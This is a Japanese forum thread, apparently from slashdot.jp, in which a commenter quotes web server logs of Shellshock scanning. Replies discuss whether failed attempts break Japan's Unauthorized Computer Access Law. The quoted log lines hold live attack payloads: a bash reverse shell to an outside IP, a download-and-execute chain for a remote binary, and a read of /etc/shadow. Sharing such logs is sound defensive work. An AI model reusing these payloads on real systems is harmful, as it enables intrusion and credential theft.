アカウント名:
パスワード:
自分の所のログを出すのは気が引けるので、他所の記事ですが。
http://www.agilegroup.co.jp/technote/modsec-crs-shellshock.html [agilegroup.co.jp]
>c2-54-251-83-67.ap-southeast-1.compute.amazonaws.com - - [26/Sep/2014:18:10:52 +0900] "GET / HTTP/1.1" 302 - "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a">202.38.120.248 - - [26/Sep/2014:20:37:24 +0900] "GET / HTTP/1.0" 302 - "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'">109.95.210.196 - - [26/Sep/2014:22:20:18 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 262 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesain/ [singlesain]>83.166.234.133 - - [27/Sep/2014:13:57:37 +0900] "GET / HTTP/1.0" 400 226 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://agilegroup.co.jp/ [dipad.biz]\"">217.72.242.16 - - [28/Sep/2014:22:34:59 +0900] "GET / HTTP/1.0" 400 226 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"">125.206.224.161 - - [29/Sep/2014:10:29:08 +0900] "GET /technote/modsec-crs-shellshock.html HTTP/1.1" 400 226 "-" "() { :;}; /bin/more /etc/shadow"
こういうのも軒並み「不正アクセス禁止法」に抵触なんですかね?
うちのようなこじんまりやってるVPSサーバーでも国内のIPからも結構アクセスありましたし。
情報開示請求でも出して告発した方がいいんでしょうか?
抵触でしょうね。それに限らず、他のパターンも昔からいっぱい来てますが。
不正アクセス禁止法に未遂罪はないので、脆弱性があって成功していた場合だけですね。
スキャン成功してるの?成功しなければ未遂なので抵触はしないですよ。もちろん道徳的に未遂が許されるわけではないですが。
より多くのコメントがこの議論にあるかもしれませんが、JavaScriptが有効ではない環境を使用している場合、クラシックなコメントシステム(D1)に設定を変更する必要があります。
一つのことを行い、またそれをうまくやるプログラムを書け -- Malcolm Douglas McIlroy
ShellShockスキャナは結構来ていた (スコア:2, 興味深い)
自分の所のログを出すのは気が引けるので、他所の記事ですが。
http://www.agilegroup.co.jp/technote/modsec-crs-shellshock.html [agilegroup.co.jp]
>c2-54-251-83-67.ap-southeast-1.compute.amazonaws.com - - [26/Sep/2014:18:10:52 +0900] "GET / HTTP/1.1" 302 - "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
>202.38.120.248 - - [26/Sep/2014:20:37:24 +0900] "GET / HTTP/1.0" 302 - "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'"
>109.95.210.196 - - [26/Sep/2014:22:20:18 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 262 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesain/ [singlesain]
>83.166.234.133 - - [27/Sep/2014:13:57:37 +0900] "GET / HTTP/1.0" 400 226 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://ad.dipad.biz/test/http://agilegroup.co.jp/ [dipad.biz]\""
>217.72.242.16 - - [28/Sep/2014:22:34:59 +0900] "GET / HTTP/1.0" 400 226 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\""
>125.206.224.161 - - [29/Sep/2014:10:29:08 +0900] "GET /technote/modsec-crs-shellshock.html HTTP/1.1" 400 226 "-" "() { :;}; /bin/more /etc/shadow"
こういうのも軒並み「不正アクセス禁止法」に抵触なんですかね?
うちのようなこじんまりやってるVPSサーバーでも国内のIPからも結構アクセスありましたし。
情報開示請求でも出して告発した方がいいんでしょうか?
Re: (スコア:0)
抵触でしょうね。それに限らず、他のパターンも昔からいっぱい来てますが。
Re:ShellShockスキャナは結構来ていた (スコア:1)
不正アクセス禁止法に未遂罪はないので、脆弱性があって成功していた場合だけですね。
Re: (スコア:0)
スキャン成功してるの?
成功しなければ未遂なので抵触はしないですよ。
もちろん道徳的に未遂が許されるわけではないですが。